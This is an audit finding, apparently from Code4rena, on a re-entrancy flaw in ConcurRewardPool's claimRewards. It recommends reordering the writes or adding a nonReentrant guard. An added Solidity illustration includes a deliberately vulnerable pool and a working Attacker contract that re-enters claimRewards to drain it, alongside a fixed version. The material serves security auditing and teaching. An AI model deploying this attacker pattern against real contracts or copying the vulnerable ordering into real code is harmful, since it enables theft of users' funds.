Re-entrancy vulnerabilities

Code4rena finding, code423n4 issue 2022-02-CONCUR-FINDINGS-ISSUES-249 (github.com)
Feb 09, 2022

Lines of code

Vulnerability details

Impact

Function claimRewards in ConcurRewardPool should be re-entrancy protected, or should zero the stored reward before sending it. As written, the transfer happens while reward[msg.sender][_tokens[i]] still holds the full amount. If any reward token runs a callback on transfer (an ERC777-style tokensReceived hook, for example), a contract recipient can re-enter claimRewards from inside that callback, read the same non-zero reward again, and be paid again; repeating this until the pool's balance of that token is exhausted drains rewards that belong to other users.

Also, consider applying re-entrancy protection to functions that do not follow the Check-Effects-Interaction pattern, even though they interact with tokens that are assumed to be safe. For instance, functions deposit and withdraw in USDMPegRecovery perform the token transfer first and only then update state, so they rely entirely on the token having no callback.

Recommended Mitigation Steps

Solution: either apply a nonReentrant modifier to claimRewards, or swap the order of these two lines so the reward is zeroed before the transfer (effect before interaction):

  IERC20(_tokens[i]).safeTransfer(msg.sender, getting);
  reward[msg.sender][_tokens[i]] = 0;

Doing both is the conservative choice: the reordering removes the exploitable window, and the guard protects any future code path that reintroduces an external call before a state write.
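The following is an added illustration of the issue and of the mitigation, not code from the Concur repository. It assumes a minimal reward pool with the same interaction-before-effect ordering as the snippet above, a hypothetical reward token whose transfer invokes a tokensReceived hook on contract recipients (the behaviour ERC777 tokens have), an attacker contract that re-enters from that hook, and a hardened pool that both reorders the writes and adds a nonReentrant guard. The setReward helper exists only so the scenario can be set up; it is not part of any real pool.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

// Hypothetical interfaces for the illustration (not Concur's code).
interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IHook {
    function tokensReceived(address from, uint256 amount) external;
}

// Vulnerable pool: the external call happens before the state write.
contract VulnerableRewardPool {
    mapping(address => mapping(address => uint256)) public reward;

    // Test-only helper so the scenario can be set up; assumed, not real.
    function setReward(address user, address token, uint256 amount) external {
        reward[user][token] = amount;
    }

    function claimRewards(address[] calldata _tokens) external {
        for (uint256 i = 0; i < _tokens.length; i++) {
            uint256 getting = reward[msg.sender][_tokens[i]];
            if (getting == 0) continue;
            // BUG: if transfer() calls back into msg.sender, claimRewards can be
            // re-entered while reward[msg.sender][_tokens[i]] is still non-zero.
            IERC20(_tokens[i]).transfer(msg.sender, getting);
            reward[msg.sender][_tokens[i]] = 0;
        }
    }
}

// Hardened pool: zero the reward first, and refuse re-entrant calls outright.
contract SafeRewardPool {
    mapping(address => mapping(address => uint256)) public reward;
    uint256 private _locked = 1;

    modifier nonReentrant() {
        require(_locked == 1, "REENTRANCY");
        _locked = 2;
        _;
        _locked = 1;
    }

    function setReward(address user, address token, uint256 amount) external {
        reward[user][token] = amount;
    }

    function claimRewards(address[] calldata _tokens) external nonReentrant {
        for (uint256 i = 0; i < _tokens.length; i++) {
            uint256 getting = reward[msg.sender][_tokens[i]];
            if (getting == 0) continue;
            reward[msg.sender][_tokens[i]] = 0;               // effect first
            IERC20(_tokens[i]).transfer(msg.sender, getting); // interaction last
        }
    }
}

// Hypothetical token whose transfer notifies contract recipients, like ERC777.
contract HookToken is IERC20 {
    mapping(address => uint256) public balanceOf;

    constructor(address pool) { balanceOf[pool] = 1_000_000 ether; }

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // The callback that makes re-entrancy possible.
        if (to.code.length > 0) IHook(to).tokensReceived(msg.sender, amount);
        return true;
    }
}

// Attacker: entitled to `reward` once, keeps re-entering until the pool is dry.
contract Attacker is IHook {
    VulnerableRewardPool public immutable pool;
    HookToken public immutable token;

    constructor(VulnerableRewardPool p, HookToken t) { pool = p; token = t; }

    function _claim() internal {
        address[] memory toks = new address[](1);
        toks[0] = address(token);
        pool.claimRewards(toks);
    }

    function attack() external { _claim(); }

    function tokensReceived(address, uint256 amount) external {
        if (msg.sender != address(token)) return;
        // reward[attacker][token] has not been zeroed yet, so claim again.
        if (token.balanceOf(address(pool)) >= amount) _claim();
    }
}
```

Against VulnerableRewardPool the nested claims each pay `getting` again and only unwind (zeroing the reward repeatedly) once the pool's balance can no longer cover a transfer. Against SafeRewardPool the re-entrant call reverts with "REENTRANCY" and the whole transaction fails; even with the guard removed, the second claim reads a zero reward and pays nothing, which is why the reordering alone already closes this particular hole.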
